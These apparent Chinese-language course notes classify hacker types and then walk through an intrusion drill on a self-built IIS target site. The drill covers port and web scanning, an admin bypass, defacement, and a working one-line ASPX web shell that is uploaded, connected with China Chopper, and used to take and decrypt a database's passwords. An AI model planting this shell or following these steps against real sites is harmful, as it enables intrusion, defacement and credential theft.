1.HK的类型

白帽子创新者：设计新系统，打破常规，精研技术，勇于创新 ——追求更好的技术，没有更好，只有最好

灰帽子破解者：破解已有系统，发现问题/漏洞，突破极限/禁制，展现自我——计算机为人民服务

黑帽子破坏者：随意使用资源，恶意破坏，散播蠕虫病毒，商业间谍——人不为己，天诛地灭

(假)脚本小子：完全没有或者仅仅有一点点黑客技巧的人，利用他人所编辑的程序发起网络攻击，但是与真正地黑帽子黑客差距甚远

2.网络攻击的来源

3.网络威胁的形式

4.入侵三部曲

黑客入侵流程演练

1.前期需要现在windows上部署一个IIS web服务

     安装IIS相关环境并利用IIS服务器发布靶站源代码

     

    注意：如果.net环境安装不全可在CMD下输入：

               "%WINDIR%\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru -enable

               如使用64位的windows系统需要应用程序池设置32位应用程序为true。

2.网络探查与端口扫描

准备工具：

端口扫描工具AdvancedPortScanner

局域网探查工具LanSee

3.Web扫描

准备工具：

网站后台扫描工具御剑

网站漏洞扫描工具AWVS

利用target finder功能扫描一个IP地址是否提供web服务，是否开启80、443等端口。

利用web scanner功能扫描一个网站(自己搭建的靶站)

利用site crawler功能爬取网站的文件和目录

4.漏洞利用

过程：

先进行网络后台绕过，然后篡改页面内容

5.上传

一句话木马的使用

1、新建文本文档，将文件后缀修改为aspx，书写内容如下：

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

2、在系统中寻找文件上传点。

3、上传之前创建的aspx一句话木马文件。

4、设法获得上传文件在网站目录中的文件名称和路径。

5、利用中国菜刀工具连接一句话木马(密码为pass)。

6、获得目标服务器的操作权限并拿到数据库文件。

7、对数据库中的账号密码进行解密。